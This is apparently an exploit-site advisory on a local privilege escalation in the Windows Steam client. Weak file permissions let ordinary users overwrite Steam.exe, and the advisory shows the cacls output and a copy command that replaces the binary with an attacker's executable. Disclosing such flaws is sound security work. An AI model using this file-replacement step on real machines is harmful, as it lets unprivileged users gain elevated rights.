Steam Insecure File Permissions Privilege Escalation

2016.09.30

zaeek (PL)

Risk: Low

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

# Exploit Title: Steam Insecure File Permissions Privilege Escalation
# Date: 24/09/2016
# Exploit Author: zaeek@protonmail.com
# Vendor Homepage: http://store.steampowered.com/
# Version: 3.61.93.65
# Tested on: Windows 7 32/64bit

====Description====

Steam Client for Windows lacks of proper file permissions, creating a vector for privilege escalation attack.
To properly exploit this vulnerability, the local attacker must overwrite the vulnerable file(s) with his malicious ones, as he has full Read/Write rights to the given file.

====Proof-of-Concept====

C:\Program Files\Steam>cacls steam.exe
C:\Program Files\Steam\Steam.exe BUILTIN\Users:(ID)F
                                 NT AUTHORITY\SYSTEM:(ID)F
                                 BUILTIN\Administrators:(ID)F
                                 MASTER-PC\MASTER:(ID)F

====Exploit====



c:\>whoami
test\testusr

c:\>net user testusr
User name                    testusr
Full Name                    testusr
(...)

Local Group Memberships      *Users
Global Group memberships     *None
The command completed successfully.


c:\>copy C:\Users\testusr\Desktop\escalate.exe "C:\Program Files\Steam\Steam.exe" /y
        1 file(s) copied.

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Steam Insecure File Permissions Privilege Escalation

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.